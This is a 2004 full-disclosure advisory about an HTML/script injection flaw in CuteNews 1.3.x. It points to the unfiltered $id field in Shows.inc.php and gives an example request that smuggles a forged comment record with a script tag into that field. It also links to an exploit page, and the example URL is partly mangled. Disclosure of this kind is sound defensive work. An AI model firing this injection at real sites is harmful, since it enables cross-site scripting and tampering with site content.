Security Advisory: [Full-Disclosure] injection html CuteNews

[EN] securityvulns.ru
no-pyccku

Related information
  CGI bugs
  [NT] Serena Software's TeamTrack Sensitive Content Disclosure
  [NT] Internet Software Sciences's Web+Center SQL Injection
  [NT] LBE Web HelpDesk SQL Injection
  [NT] Polar HelpDesk Inadequate Security Checks

From: DarkBicho <darkbicho_(at)_fastmail.fm>
Date: 19.07.2004
Subject: [Full-Disclosure] injection html CuteNews

Original Advisory: http://www.darkbicho.iberhosting.net/advisory-11.txt

---------------------------------------------------------------------------------
----------------

                           :.: injection html CuteNews :.:

PROGRAM: CuteNews
HOMEPAGE: http://cutephp.com/
VERSION: v1.3.x
BUG: injection html
DATE: 15/07/2004
AUTHOR: DarkBicho
         web: http://www.darkbicho.tk
         team: Security Wari Proyects <www.swp-zone.org>
         Email: darkbicho@peru.com

---------------------------------------------------------------------------------
----------------

1.- Affected software description:
   -----------------------------

   CuteNews is a popular News Publishing, written in php by
   CutePHP.

2.- vulnerability:
   ---------------

   Injection HTML in commentaries

   /inc/Shows.inc.php

   Line: 189

   if(!$found){ fwrite($new_comments,
   "$id|>|$time|$name|$mail|$ip|$comments||\n"); }

   the variable $id is not filtered

   injection html

   id of it the news = 1078525267

   Example:


show_news.php?subaction=addcomment&name=DarkBich0&comments=HREF="/?gohttp://www.darkbicho.tk" class="fixed">http://www.darkbicho.tk&id=1078525267|
   >|1090074219|DarkBich0|none|127.0.0.
1|<script>alert("DarkBicho");</script>||


   :.: http://www.darkbicho.iberhosting.net/cutenews/cutenews.gif :.:

3.- Exploit:
   --------

   http://www.darkbicho.iberhosting.net/cutenews/

3.- SOLUTION:
    ¨¨¨¨¨¨¨¨
   Vendors were contacted many weeks ago and plan to release a fixed
   version soon.
   Check the CuteNews website for updates and official release details.

4.- Greetings:
   ---------

   greetings to my Peruvian group swp and perunderforce :D
   "EL PISCO ES Y SERA PERUANO"

5.- Contact
   -------

       WEB: http://www.darkbicho.tk
       EMAIL: darkbicho@peru.com

---------------------------------------------------------------------------------
----------------
                               ___________      ____________
                              /   _____/ \    / \______   \
                              \_____ \\   \/\/   /|     ___/
                             /        \\        / |    |
                            /_______ / \__/\ / |____|
                            \/       \/

                               Security Wari Projects
                                 (c) 2002 - 2004
                                   Made in Peru

----------------------------------------[   EOF
]----------------------------------------------



DarkBicho
Web: http://www.darkbicho.tk
"Mi unico delito es ver lo que otros no pueden ver"

---------------------- The End ----------------------

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html